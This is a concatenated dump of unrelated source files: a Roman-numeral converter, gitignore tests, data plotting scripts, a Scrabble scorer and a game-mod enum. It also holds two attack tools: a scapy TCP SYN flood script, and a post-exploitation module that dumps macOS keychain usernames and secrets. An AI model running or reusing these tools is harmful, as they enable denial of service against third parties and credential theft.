Given a roman numeral, convert it to an integer. Input is guaranteed to be within the range from 1 to 3999.
'''
class Solution(object):
    def romanToInt(self, s):
        """
        Convert a Roman numeral (1..3999) to an integer.

        Scans left to right, preferring a two-character subtractive pair
        (IV, IX, XL, XC, CD, CM) over a single symbol.

        :type s: str
        :rtype: int
        """
        answer = 0
        roman_dict = {'I': 1,
                      'V': 5,
                      'X': 10,
                      'L': 50,
                      'C': 100,
                      'D': 500,
                      'M': 1000,
                      'IV': 4,
                      'IX': 9,
                      'XL': 40,
                      'XC': 90,
                      'CD': 400,
                      'CM': 900
                      }
        i = 0
        while i < len(s):
            if i + 1 < len(s) and s[i] + s[i + 1] in roman_dict:
                answer += roman_dict[s[i] + s[i + 1]]
                # BUG FIX: the original advanced i by only 1 here, so the
                # second symbol of a pair was counted twice ("IV" -> 9).
                i += 2
            else:
                answer += roman_dict[s[i]]
                i += 1
        return answer
| [
"nataliya.s.pavlova@gmail.com"
] | nataliya.s.pavlova@gmail.com |
1ced1e5bd8b38f823f7c72e74c340613a4c11f63 | a9c0daa4a7b9a4d7341afcab270c5b5debb8c13f | /env/lib/python3.6/site-packages/pathspec/tests/test_gitignore.py | af1ee7a82daa8a6f90fb940d7c15e127faf3eb7e | [] | no_license | phamcong/alienator-plf | bad8c4e003fd189c43243b31ef2b975b6f154754 | ea65628af66fbca51f2248ceb4ba93f858dbddce | refs/heads/master | 2022-11-26T01:28:38.286261 | 2017-11-07T15:12:08 | 2017-11-07T15:12:08 | 109,412,097 | 0 | 1 | null | 2020-07-25T23:43:17 | 2017-11-03T15:30:22 | JavaScript | UTF-8 | Python | false | false | 5,066 | py | # encoding: utf-8
"""
This script tests ``GitIgnorePattern``.
"""
import unittest
import pathspec.util
from pathspec import GitIgnorePattern
class GitIgnoreTest(unittest.TestCase):
	"""
	The ``GitIgnoreTest`` class tests the ``GitIgnorePattern``
	implementation.

	Each test checks both the compiled ``include`` flag and the exact regex
	``GitIgnorePattern`` translates the gitignore glob into.
	"""

	def test_00_empty(self):
		"""
		Tests an empty pattern.
		"""
		# An empty line is a null pattern: neither include nor exclude.
		spec = GitIgnorePattern('')
		self.assertIsNone(spec.include)
		self.assertIsNone(spec.regex)

	def test_01_absolute_root(self):
		"""
		Tests a single root absolute path pattern.

		This should NOT match any file (according to git check-ignore (v2.4.1)).
		"""
		spec = GitIgnorePattern('/')
		self.assertIsNone(spec.include)
		self.assertIsNone(spec.regex)

	def test_01_absolute(self):
		"""
		Tests an absolute path pattern.

		This should match:

			an/absolute/file/path
			an/absolute/file/path/foo

		This should NOT match:

			foo/an/absolute/file/path
		"""
		spec = GitIgnorePattern('/an/absolute/file/path')
		self.assertTrue(spec.include)
		self.assertEqual(spec.regex.pattern, '^an/absolute/file/path(?:/.*)?$')

	def test_01_relative(self):
		"""
		Tests a relative path pattern.

		This should match:

			spam
			spam/
			foo/spam
			spam/foo
			foo/spam/bar
		"""
		spec = GitIgnorePattern('spam')
		self.assertTrue(spec.include)
		self.assertEqual(spec.regex.pattern, '^(?:.+/)?spam(?:/.*)?$')

	def test_01_relative_nested(self):
		"""
		Tests a relative nested path pattern.

		This should match:

			foo/spam
			foo/spam/bar

		This should **not** match (according to git check-ignore (v2.4.1)):

			bar/foo/spam
		"""
		spec = GitIgnorePattern('foo/spam')
		self.assertTrue(spec.include)
		self.assertEqual(spec.regex.pattern, '^foo/spam(?:/.*)?$')

	def test_02_comment(self):
		"""
		Tests a comment pattern.
		"""
		# '#'-prefixed lines are gitignore comments: also a null pattern.
		spec = GitIgnorePattern('# Cork soakers.')
		self.assertIsNone(spec.include)
		self.assertIsNone(spec.regex)

	def test_02_ignore(self):
		"""
		Tests an exclude pattern.

		This should NOT match (according to git check-ignore (v2.4.1)):

			temp/foo
		"""
		# Leading '!' negates the pattern: include becomes False.
		spec = GitIgnorePattern('!temp')
		self.assertIsNotNone(spec.include)
		self.assertFalse(spec.include)
		self.assertEqual(spec.regex.pattern, '^(?:.+/)?temp$')

	def test_03_child_double_asterisk(self):
		"""
		Tests a directory name with a double-asterisk child
		directory.

		This should match:

			spam/bar

		This should **not** match (according to git check-ignore (v2.4.1)):

			foo/spam/bar
		"""
		spec = GitIgnorePattern('spam/**')
		self.assertTrue(spec.include)
		self.assertEqual(spec.regex.pattern, '^spam/.*$')

	def test_03_inner_double_asterisk(self):
		"""
		Tests a path with an inner double-asterisk directory.

		This should match:

			left/bar/right
			left/foo/bar/right
			left/bar/right/foo

		This should **not** match (according to git check-ignore (v2.4.1)):

			foo/left/bar/right
		"""
		spec = GitIgnorePattern('left/**/right')
		self.assertTrue(spec.include)
		self.assertEqual(spec.regex.pattern, '^left(?:/.+)?/right(?:/.*)?$')

	def test_03_only_double_asterisk(self):
		"""
		Tests a double-asterisk pattern which matches everything.
		"""
		spec = GitIgnorePattern('**')
		self.assertTrue(spec.include)
		self.assertEqual(spec.regex.pattern, '^.+$')

	def test_03_parent_double_asterisk(self):
		"""
		Tests a file name with a double-asterisk parent directory.

		This should match:

			foo/spam
			foo/spam/bar
		"""
		spec = GitIgnorePattern('**/spam')
		self.assertTrue(spec.include)
		self.assertEqual(spec.regex.pattern, '^(?:.+/)?spam(?:/.*)?$')

	def test_04_infix_wildcard(self):
		"""
		Tests a pattern with an infix wildcard.

		This should match:

			foo--bar
			foo-hello-bar
			a/foo-hello-bar
			foo-hello-bar/b
			a/foo-hello-bar/b
		"""
		spec = GitIgnorePattern('foo-*-bar')
		self.assertTrue(spec.include)
		self.assertEqual(spec.regex.pattern, '^(?:.+/)?foo\\-[^/]*\\-bar(?:/.*)?$')

	def test_04_postfix_wildcard(self):
		"""
		Tests a pattern with a postfix wildcard.

		This should match:

			~temp-
			~temp-foo
			~temp-foo/bar
			foo/~temp-bar
			foo/~temp-bar/baz
		"""
		spec = GitIgnorePattern('~temp-*')
		self.assertTrue(spec.include)
		self.assertEqual(spec.regex.pattern, '^(?:.+/)?\\~temp\\-[^/]*(?:/.*)?$')

	def test_04_prefix_wildcard(self):
		"""
		Tests a pattern with a prefix wildcard.

		This should match:

			bar.py
			bar.py/
			foo/bar.py
			foo/bar.py/baz
		"""
		spec = GitIgnorePattern('*.py')
		self.assertTrue(spec.include)
		self.assertEqual(spec.regex.pattern, '^(?:.+/)?[^/]*\\.py(?:/.*)?$')

	def test_05_directory(self):
		"""
		Tests a directory pattern.

		This should match:

			dir/
			foo/dir/
			foo/dir/bar

		This should **not** match:

			dir
		"""
		spec = GitIgnorePattern('dir/')
		self.assertTrue(spec.include)
		self.assertEqual(spec.regex.pattern, '^(?:.+/)?dir/.*$')

	def test_05_registered(self):
		"""
		Tests that the pattern is registered.
		"""
		# The 'gitignore' name must resolve back to GitIgnorePattern.
		self.assertIs(pathspec.util.lookup_pattern('gitignore'), GitIgnorePattern)
if __name__ == '__main__':
	# Allow running this module directly with verbose test output.
	suite = unittest.TestLoader().loadTestsFromTestCase(GitIgnoreTest)
	unittest.TextTestRunner(verbosity=2).run(suite)
| [
"ccuong.ph@gmail.com"
] | ccuong.ph@gmail.com |
2c84e1184dcff48a9f0361defaecc42d83e013f5 | 3136e4218e913212fda9c64b68155d4dd203ee2a | /UMAP_paper.py | aa9a9cd577ab9a37ff34d8bd1d036f69c2f7e36f | [] | no_license | anhlpham/kmeans_Femodel | 8ff27c94c8c25f3bac5a0064a70da3b04cadc53b | 8588f190ea06321224f59929a0e922bc653b962a | refs/heads/master | 2021-07-18T06:19:24.545755 | 2020-07-09T15:36:31 | 2020-07-09T15:36:31 | 191,383,848 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,287 | py | # -*- coding: utf-8 -*-
"""
Created on %(date)s
@author: %(username)s
"""
import numpy as np
from sklearn.datasets import load_iris, load_digits
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
from scipy.io import loadmat
from numpy import linspace
from numpy import meshgrid
from matplotlib.backends.backend_pdf import PdfPages
%matplotlib inline
sns.set(style='white', context='notebook', rc={'figure.figsize':(14,10)})
annots = loadmat('Parekh_dust2.mat')
annots.keys()
Xn = annots['Xn'];
type(annots['Xn']),annots['Xn'].shape
IDX_new = annots['IDX_new']
IDX = np.reshape(IDX_new,(35456))
target = np.array([1, 2, 3, 4]);
print(Xn)
print(type(Xn))
X_df = pd.DataFrame(Xn)
X_df['class'] = pd.Series(IDX)
#.map(dict(zip(range(3),target)))
with PdfPages('Visulization.pdf') as pdf:
sns.pairplot(X_df, hue='class');
pdf.savefig()
import umap
reducer = umap.UMAP()
embedding = reducer.fit_transform(Xn)
embedding.shape
plt.scatter(embedding[:, 0], embedding[:, 1], c=[sns.color_palette()[x] for x in IDX])
plt.gca().set_aspect('equal', 'datalim')
plt.title('UMAP projection of sFe-dust model', fontsize=24);
plt.savefig('UMAP-sFe-dust.pdf') | [
"noreply@github.com"
] | anhlpham.noreply@github.com |
e914343fa85ca6d3f23aeda9938362687fbe0344 | 20c20938e201a0834ccf8b5f2eb5d570d407ad15 | /abc146/abc146_c/8937880.py | ee9c12a0ce700fce574a65e29313213efa3efaa3 | [] | no_license | kouhei-k/atcoder_submissions | 8e1a1fb30c38e0d443b585a27c6d134bf1af610a | 584b4fd842ccfabb16200998fe6652f018edbfc5 | refs/heads/master | 2021-07-02T21:20:05.379886 | 2021-03-01T12:52:26 | 2021-03-01T12:52:26 | 227,364,764 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | py | A, B, X = map(int, input().split())
# Binary search for the largest N in [1, 1e9] whose total cost
# A*N + B*len(str(N)) does not exceed X; A, B, X are read from stdin above.
# Prints 0 when even N = 1 is too expensive.
minN = 1
maxN = 10**9
ans = 0
while(1):
    N = (minN + maxN) // 2
    n = A*N + len(str(N))*B  # cost of buying integer N
    if n <= X:
        ans = N  # N is affordable; remember it as a candidate answer
    if minN == maxN:
        break
    if n < X:
        minN = N+1  # might afford a larger N
    else:
        maxN = N  # too expensive (or exactly X): shrink the upper bound
print(ans)
| [
"kouhei.k.0116@gmail.com"
] | kouhei.k.0116@gmail.com |
034fbb107abd9dc6e34d47c3bcf37d032990de10 | ba22c05a40f965d5aae44a3d1a909fb23195645a | /test_hvlfilereader.py | b9d35962ddf521c556d1c2e66a385b2f0e31c12c | [] | no_license | bernienor/hvlreader | dd6021c27f4ea092d53345c999b7074c37719bd5 | 9fee58c2946bac24fcf0c888bb596fc7175c86a4 | refs/heads/master | 2020-03-13T19:49:30.756512 | 2018-05-16T13:06:20 | 2018-05-16T13:06:20 | 131,261,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,605 | py | # Unittest module for hvlfilereader
import unittest
import hvlfilereader as hvlfr
import numpy as np
'''>>> dir(self.fr1)
['__class__', '__delattr__', '__dict__', '__dir__', '__doc__',
'__eq__', '__format__', '__ge__', '__getattribute__', '__gt__',
'__hash__', '__init__', '__init_subclass__', '__le__', '__lt__',
'__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__',
'__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__',
'__weakref__', 'data', 'header', 'identifyfile', 'instrumenttype',
'model', 'samplerate']
'''
class tektronixfrTestCase(unittest.TestCase):
    """Tests for `hvlfilereader.py`."""
    def setUp(self):
        # Parse the bundled Tektronix DPO2012B capture before every test.
        self.fr1 = hvlfr.tektronixfr(
            'testfiles/tektronix_DPO2012B/T0001CH1.CSV')
        pass
    def tearDown(self):
        pass
    def test_tekfr_T0001CH1(self):
        # Attribute types exposed by the reader.
        self.assertIsInstance(self.fr1.data, np.ndarray)
        self.assertIsInstance(self.fr1.header, list)
        self.assertIsInstance(self.fr1.instrumenttype, str)
        self.assertIsInstance(self.fr1.model, str)
        self.assertIsInstance(self.fr1.samplerate, float)
        # Fixture-specific values: 6249 rows x 3 columns.
        self.assertEqual(self.fr1.data.size, 18747)
        self.assertEqual(self.fr1.data.shape, (6249, 3))
        self.assertEqual(self.fr1.instrumenttype, 'Tektronix oscilioscope')
        self.assertEqual(self.fr1.model, 'DPO2012B')
        # You have to compute the delta to secure the resolution
        self.assertAlmostEqual(self.fr1.samplerate, 1.6e-07,
                               delta=(self.fr1.samplerate/1.0e7))
delta=(self.fr1.samplerate/1.0e7))
# Allow running this test module directly: python test_hvlfilereader.py
if __name__ == '__main__':
    unittest.main()
| [
"bhhe@hvl.no"
] | bhhe@hvl.no |
30ac3811a3b1bd1fe781ad76f925c49dc1176111 | 84888c7f9d6d7195917053b2d14b2d30e1e5e375 | /stress_testing/tcp_syn_flood.py | 165848ca4522c0e0c341fb99281fc5f23da65896 | [] | no_license | codeandrew/offensivesecurity-python | a8d48c565d2434430e6f0e3069385b19dfbdef60 | 364ff7233c31a4a853f9ef185f96078e50c7bef4 | refs/heads/master | 2023-08-17T11:23:44.852329 | 2023-08-02T14:54:37 | 2023-08-02T14:54:37 | 242,969,080 | 12 | 5 | null | 2023-09-04T16:45:25 | 2020-02-25T10:10:59 | Python | UTF-8 | Python | false | false | 628 | py | from scapy.all import *
import sys
def main(target_ip, target_port, rounds=10_000):
    # Stress-test tool: flood the target with `rounds` TCP SYN packets, each
    # carrying a 1 KiB payload.  Requires raw-socket privileges (scapy) and
    # must only be used against systems you are authorized to test.
    print(f"Target IP: {target_ip}")
    print(f"Target Port: {target_port}")
    print(f"Rounds: {rounds}")
    # Define the payload to send in the packets
    payload = "A" * 1024
    # Create a loop to send a large number of packets to the target
    for i in range(rounds):
        packet = IP(dst=target_ip) / TCP(dport=target_port, flags="S") / payload
        send(packet, verbose=False)
if __name__ == "__main__":
target_ip = sys.argv[1]
target_port = int(sys.argv[2])
main(target_ip=target_ip, target_port=target_port)
| [
"jeanandrewfuentes@gmail.com"
] | jeanandrewfuentes@gmail.com |
ed59c8429e16034cc54de92822ca1098379ed85b | ea9cdb2e9a4d47d4f5e4141dbdb271d57133a20d | /input.py | d6bb96a93a6553a5ec42ad6705b4e87dbfe4f2ad | [] | no_license | ActronikaSAS/libtup-python | 1295a1d06e600f63874c1b138f249b6c1492c58f | d81c76e8846708f56c4c8f895b6200470a7e2a57 | refs/heads/master | 2020-12-15T13:33:47.590182 | 2018-03-21T09:05:56 | 2018-03-21T09:05:56 | 235,119,388 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 762 | py | INT32_MAX = 2**31 - 1
# Bounds of a signed 32-bit integer.
INT32_MAX = 2 ** 31 - 1
INT32_MIN = -(2 ** 31)


class Input(object):
    """An input with a byte-sized id (0-255) and a signed 32-bit value.

    Assignments that are not ints, or fall outside the valid range, are
    silently ignored and leave the previous value in place.
    """

    def __init__(self, id=0, value=0):
        self.id = id
        self.value = value

    def __str__(self):
        return "<id: {}, value: {}>".format(self._id, self._value)

    def __eq__(self, other):
        return self._id == other._id and self._value == other._value

    @property
    def id(self):
        return self._id

    @id.setter
    def id(self, id):
        # Accept only ints that fit in a single unsigned byte.
        if isinstance(id, int) and 0 <= id <= 255:
            self._id = id

    @property
    def value(self):
        return self._value

    @value.setter
    def value(self, value):
        # Accept only ints representable as a signed 32-bit integer.
        if isinstance(value, int) and INT32_MIN <= value <= INT32_MAX:
            self._value = value
| [
"jeremy.cheynet@actronika.com"
] | jeremy.cheynet@actronika.com |
0a0bbbc2c5c386530dc1a01181c8d65e714baa27 | b39146ab2217325034b197a1398a421d9121b5ea | /DB.py | 6fbd069796528110508776881079f69972edfcf0 | [] | no_license | CalirDeminar/WHHistory | 11ca8523f5b9f399d0812f1a1c3e0aae84868beb | 7e5238ec2aa0c3f62bb25ede204df895395f3274 | refs/heads/master | 2023-05-31T02:10:36.919252 | 2021-06-19T16:21:34 | 2021-06-19T16:21:34 | 366,289,744 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,599 | py | import sqlite3
import requests
import json
import datetime
import Transfer
def split(array, n):
    """Split *array* into consecutive chunks of length *n*; the final chunk
    may be shorter when len(array) is not a multiple of *n*."""
    chunk_count = (len(array) + n - 1) // n  # ceiling division
    return [array[start * n:(start + 1) * n] for start in range(chunk_count)]
class DB:
    """SQLite persistence layer plus an ESI name-resolution helper for the
    corp-transfer history."""
    @staticmethod
    def set_up_tables(db):
        """Create the corps, characters, and transfers tables if absent."""
        db.execute('''CREATE TABLE IF NOT EXISTS corps (id number, name text)''')
        db.execute('''CREATE TABLE IF NOT EXISTS characters (id number, name text)''')
        db.execute(
            '''CREATE TABLE IF NOT EXISTS transfers ''' +
            '''(id text, date text, character number, source number, destination number)'''
        )
    @staticmethod
    def connect():
        """Open (or create) the local SQLite database file."""
        return sqlite3.connect("./WHHistory.sqlite3")
    @staticmethod
    def populate_corps():
        """Resolve every corp id seen in transfers to a name via EVE ESI and
        store the results in the corps table."""
        db = DB.connect()
        source_corp_list = list(map(lambda r: r[0], db.execute("SELECT source FROM transfers").fetchall()))
        destination_corp_list = list(map(lambda r: r[0], db.execute("SELECT destination FROM transfers").fetchall()))
        # Deduplicate ids appearing as source and/or destination.
        corp_list = list(set(source_corp_list + destination_corp_list))
        # The ESI names endpoint accepts batches; 100 ids per request.
        for sublist in split(corp_list, 100):
            resp = requests.post(
                "https://esi.evetech.net/latest/universe/names/?datasource=tranquility&language=en",
                data=json.dumps(sublist),
                headers={'Accept': 'application/json', 'Accept-Language': 'en', 'Content-Type': 'application/json'}
            ).json()
            for corp in resp:
                print(corp)
                db.execute("INSERT INTO corps VALUES (?, ?)", (corp["id"], corp["name"]))
        db.commit()
    @staticmethod
    def get_transfers_into_corp(db, corp_id):
        """Return Transfer objects whose destination is corp_id, oldest first."""
        raw = db.execute("SELECT * FROM transfers WHERE destination=? ORDER BY date ASC", (corp_id,)).fetchall()
        return list(map(lambda t: Transfer.Transfer(t[0], t[1], t[2], t[3], t[4]), raw))
    @staticmethod
    def get_transfers_out_of_corp(db, corp_id):
        """Return Transfer objects whose source is corp_id, oldest first."""
        raw = db.execute("SELECT * FROM transfers WHERE source=? ORDER BY date ASC", (corp_id,)).fetchall()
        return list(map(lambda t: Transfer.Transfer(t[0], t[1], t[2], t[3], t[4]), raw))
    @staticmethod
    def get_corp_starting_date(db, corp_id):
        """Return the earliest inbound-transfer date for corp_id as a datetime.

        Raises IndexError if the corp has no inbound transfers."""
        start_date_string = db.execute("SELECT MIN(date) FROM transfers WHERE destination=?", (corp_id,)).fetchall()[0][0]
        # Stored dates look like ISO-8601 with 'T'/'Z'; normalize for fromisoformat.
        return datetime.datetime.fromisoformat(start_date_string.replace("T", " ").replace("Z", ""))
    @staticmethod
    def get_corp_dict(db):
        """Return a {corp_id: corp_name} mapping from the corps table."""
        corps = db.execute("SELECT * FROM corps")
        output = {}
        for line in corps:
            output[line[0]] = line[1]
        return output
| [
"edward.firespinner@gmail.com"
] | edward.firespinner@gmail.com |
069ed29ea5a3a37cd84c94ed6edec5292f7aae54 | fe43fda2fa2d70f098d42d8a66498ab89d6dfcec | /projdemo/projdemo/wsgi.py | 2d09f247e93c7b20bd4c04c4f6ef591fc115f0e6 | [] | no_license | Candy128x/chat-bot-dl | be5b0a711f579720744b9ce50b003b6ee0565670 | 5ebd0b1832be82a04947f12fd2da2f41e322e08a | refs/heads/master | 2022-12-12T16:55:05.296789 | 2019-10-27T17:32:45 | 2019-10-27T17:32:45 | 217,884,328 | 0 | 0 | null | 2022-12-08T01:03:48 | 2019-10-27T16:35:46 | Python | UTF-8 | Python | false | false | 393 | py | """
WSGI config for projdemo project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings before building the WSGI callable.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'projdemo.settings')
application = get_wsgi_application()
| [
"sondagarashish@gmail.com"
] | sondagarashish@gmail.com |
e67db8d886f24e7f5427f3b95f18f2dd7b50a12c | ce73253b1f80678d27e04f65577d1e24eb1587be | /ScrabbleGame.py | 801a3b588c297bdfc66cc27e691179a4a2926a28 | [] | no_license | karolminuth/Scrabble | 011f7c66f139c6905bddb5e7aafbddba437e3be0 | c0048f6c612035aa6b425a0275c0d94c31be19e9 | refs/heads/master | 2020-04-12T23:30:39.312961 | 2018-12-22T15:26:11 | 2018-12-22T15:26:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,277 | py | import random
class Scrabble:
    """Score words from a word-list file using Scrabble letter values."""

    def __init__(self, f):
        # (score, letters) pairs of the standard English tile distribution.
        self.SCRABBLES_SCORES = [(1, "E A O I N R T L S U"),
                                 (2, "D G"),
                                 (3, "B C M P"),
                                 (4, "F H V W Y"),
                                 (5, "K"),
                                 (8, "J X"),
                                 (10, "Q Z")]
        # Flatten the table into a single letter -> score lookup.
        self.LETTER_SCORES = {}
        for score, letters in self.SCRABBLES_SCORES:
            for letter in letters.split():
                self.LETTER_SCORES[letter] = score
        self.file_path = f
        self.words = self.read_file_and_change_for_big_letters()
        self.values_of_each_word = self.count_value_of_each_word()
        self.dict_word_and_value = dict(zip(self.words, self.values_of_each_word))
        self.max_value = max(self.values_of_each_word)
        self.min_value = min(self.values_of_each_word)

    def read_file_and_change_for_big_letters(self):
        """Return the file's words, stripped and upper-cased."""
        with open(self.file_path, "r") as handle:
            return [line.strip().upper() for line in handle]

    def count_value_of_each_word(self):
        """Return the Scrabble score of every loaded word, in file order."""
        return [sum(self.LETTER_SCORES[letter] for letter in word)
                for word in self.words]

    def check_value_of_entered_word(self, word):
        """Return the Scrabble score of *word* (case-insensitive)."""
        return sum(self.LETTER_SCORES[letter] for letter in word.upper())

    def find_word_equal_searched_value(self, value_of_searched_word):
        """Return a random loaded word whose score equals the given value.

        Prints a notice and returns '' when no word matches."""
        matches = [word for word, value in self.dict_word_and_value.items()
                   if value == value_of_searched_word]
        if not matches:
            print('There isn\'t a word on this value, nothing to show')
            return ''
        return random.choice(matches)
| [
"karolminuth@gmail.com"
] | karolminuth@gmail.com |
7c9e003239f263252fb0adea540bb5e1962cd733 | b3b68efa404a7034f0d5a1c10b281ef721f8321a | /src/sims4communitylib/enums/common_species.py | eacddcd09423a491b7c32754f111f81175abc65a | [
"Apache-2.0"
] | permissive | velocist/TS4CheatsInfo | 62195f3333076c148b2a59f926c9fb5202f1c6fb | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | refs/heads/main | 2023-03-08T01:57:39.879485 | 2021-02-13T21:27:38 | 2021-02-13T21:27:38 | 337,543,310 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,376 | py | """
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from sims.sim_info import SimInfo
from sims4communitylib.enums.enumtypes.common_int import CommonInt
class CommonSpecies(CommonInt):
    """Custom Species enum containing all species (including extended species).
    """
    # Sentinel for sims matching none of the known species checks below.
    INVALID: 'CommonSpecies' = 0
    HUMAN: 'CommonSpecies' = 1
    SMALL_DOG: 'CommonSpecies' = 2
    LARGE_DOG: 'CommonSpecies' = 3
    CAT: 'CommonSpecies' = 4

    @staticmethod
    def get_species(sim_info: SimInfo) -> 'CommonSpecies':
        """Retrieve the CommonSpecies of a sim. Use this instead of CommonSpeciesUtils.get_species to determine a more specific species.
        """
        # Imported lazily to avoid a circular import at module load time.
        from sims4communitylib.utils.sims.common_species_utils import CommonSpeciesUtils
        if CommonSpeciesUtils.is_human(sim_info):
            return CommonSpecies.HUMAN
        elif CommonSpeciesUtils.is_small_dog(sim_info):
            return CommonSpecies.SMALL_DOG
        elif CommonSpeciesUtils.is_large_dog(sim_info):
            return CommonSpecies.LARGE_DOG
        elif CommonSpeciesUtils.is_cat(sim_info):
            return CommonSpecies.CAT
        # No check matched: report INVALID rather than raising.
        return CommonSpecies.INVALID
| [
"cristina.caballero2406@gmail.com"
] | cristina.caballero2406@gmail.com |
a10701bb04036178579d66ffefcb5e613494d8ab | 8540476da336da252dc9b00b66fb8b666981cee6 | /Pattern_25.py | d83bf2de5436d1981beae259ad49acc24cde7628 | [] | no_license | Sagar-VV/Patterns | a54f3cc2a203b565d5f267109b44377b30f411bc | 5891c17c86b0e4547d345ee45fe0f7daa8aaf295 | refs/heads/main | 2023-03-05T01:53:33.935021 | 2021-02-20T08:45:59 | 2021-02-20T08:45:59 | 336,732,347 | 0 | 1 | null | 2021-02-20T08:46:00 | 2021-02-07T07:52:49 | Python | UTF-8 | Python | false | false | 364 | py | # This was the required output, Please find the code below for the same.
# 1
# 2 2
# 3 3 3
# 4 4 4 4
# 5 5 5 5 5
def numpat(n):
for i in range(n,0,-1):
for y in range(i - 1, -1, -1):
print(' ', end=' ')
for z in range (n-i+1):
print(n-i+1, end=' ')
print('')
numpat(5)
| [
"noreply@github.com"
] | Sagar-VV.noreply@github.com |
413f0b7b9ab12d75b76ef41418717665a490a242 | d489eb7998aa09e17ce8d8aef085a65f799e6a02 | /lib/modules/python/collection/osx/keychaindump_decrypt.py | 64015ea23ade2de15835ef86ce40b32770ac9187 | [
"MIT"
] | permissive | fengjixuchui/invader | d36078bbef3d740f95930d9896b2d7dd7227474c | 68153dafbe25e7bb821c8545952d0cc15ae35a3e | refs/heads/master | 2020-07-21T19:45:10.479388 | 2019-09-26T11:32:38 | 2019-09-26T11:32:38 | 206,958,809 | 2 | 1 | MIT | 2019-09-26T11:32:39 | 2019-09-07T11:32:17 | PowerShell | UTF-8 | Python | false | false | 3,432 | py | class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Sandbox-Keychain-Dump',
# list of one or more authors for the module
'Author': ['@import-au'],
# more verbose multi-line description of the module
'Description': ("Uses Apple Security utility to dump the contents of the keychain. "
"WARNING: Will prompt user for access to each key."
"On Newer versions of Sierra and High Sierra, this will also ask the user for their password for each key."),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : "",
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': [
""
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'OutFile' : {
'Description': 'File to output AppleScript to, otherwise displayed on the screen.',
'Required': False,
'Value': ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
script = r"""
import subprocess
import re
process = subprocess.Popen('/usr/bin/security dump-keychain -d', stdout=subprocess.PIPE, shell=True)
keychain = process.communicate()
find_account = re.compile('0x00000007\s\<blob\>\=\"([^\"]+)\"\n.*\n.*\"acct\"\<blob\>\=\"([^\"]+)\"\n.*\n.*\n.*\n\s+\"desc\"\<blob\>\=([^\n]+)\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\ndata\:\n([^\n]+)')
accounts = find_account.findall(keychain[0])
for account in accounts:
print("System: " + account[0])
print("Description: " + account[2])
print("Username: " + account[1])
print("Secret: " + account[3])
"""
return script
| [
"noreply@github.com"
] | fengjixuchui.noreply@github.com |
26612a2b9ce408c47f5b491ad96a276677aaa755 | e4c10bdbbc1dc31fbcff7e46f1c5df1279aa6bac | /plot_energies.py | d43631cffb3a537ac46e4e4ff1b4ab56a89b72c1 | [] | no_license | Yliu566/Uselfuls_Scripts | 898dbf17c8de3058002451178737d1ff25bc2be0 | c8e6296d54dfa57d7afb9a67803c228368741e36 | refs/heads/master | 2021-05-21T18:20:47.420650 | 2020-11-13T14:13:15 | 2020-11-13T14:13:15 | 252,751,186 | 0 | 0 | null | 2020-04-03T14:10:39 | 2020-04-03T14:10:38 | null | UTF-8 | Python | false | false | 1,312 | py | #!/usr/bin/python
# Anna Tomberg
# Plot info from orca run using *.out file
# Last updated : 02-12-2015
import sys
import re
import matplotlib.pyplot as plt
from matplotlib.ticker import FormatStrFormatter
# ------------- GET INPUT FILE ------------- #
if len(sys.argv) <= 1:
name = raw_input("Enter path to input: ")
else:
name = sys.argv[1]
fo = open(name, "r")
lines = fo.readlines()
fo.close()
# ------------------------------------------ #
# -------------- EXTRACT INFO -------------- #
print lines[2]
if re.search(" O R C A ", lines[2]):
print 'this is an orca output'
we_continue = True
else :
print 'dunno this output format!'
we_continue = False
if we_continue:
Energy = []
for line in lines:
if re.search("Total Energy : ", line):
temp = line.split()[3]
Energy.append(temp)
# convert string to float
Energy=[(lambda x: float(x))(x) for x in Energy]
# ------------- PLOTTING STUFF ------------- #
# If only SCF cycle, plot OPTION 1.
# If got passed 1st SCF cycle, plot OPTION 2.
# ------------------------------------------ #
# OPTION 1:
if Energy != []:
plt.figure()
ax = plt.subplot(111)
plt.title("Energy")
ax.yaxis.set_major_formatter(FormatStrFormatter('%.2f'))
ax.plot(list(range(1, len(Energy)+1)), Energy, 'r-')
plt.show()
| [
"anna.tomberg@gmail.com"
] | anna.tomberg@gmail.com |
